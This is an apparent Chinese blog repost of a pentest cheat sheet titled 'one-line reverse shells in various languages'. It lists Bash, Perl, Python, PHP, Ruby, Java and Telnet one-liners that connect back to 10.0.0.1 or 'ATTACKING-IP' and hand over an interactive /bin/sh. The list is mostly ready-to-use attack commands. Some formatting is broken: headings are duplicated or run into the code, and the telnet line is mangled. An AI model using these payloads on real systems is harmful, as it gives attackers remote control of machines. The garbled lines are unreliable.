各种语言一句话反弹shell
2015-12-30 11:03
567 查看
转自:http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell
Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]
PHP
Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Pythonpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'(栗子:https://www.exploit-db.com/exploits/39033/)PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'Rubyruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Javar = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 第1个Shell脚本程序
- [笔记]shell中函数使用基础
- shell中$0,$?,$!等的特殊用法
- shell脚本超时控制
- shell 初学者 必读 ,强烈推荐新手读
- linux下C语言printf没有输出的问题(shell的行缓冲机制)
- Shell脚本中替换字符串等操作
- bash的特殊用法
- linux shell ping检测脚本
- XSHELL下直接下载文件到本地(Windows)
- keepass实现Xshell自动登录与跳转
- shell编程实战
- 将shell脚本执行情况写入Rsyslog日志服务器
- Shell实现直接发送短信
- shell基础知识
- ssh免密码登录
- 基于jmeter和shell的接口性能自动化
- 正则表达式 linux shell 删除偶数奇数行 取得最后一个字符 s/\(^.*$\)\n^.*$/\1/g
- 收集整理比较全 shell sed 命令与实例教程
- linux2--ssh secure shell client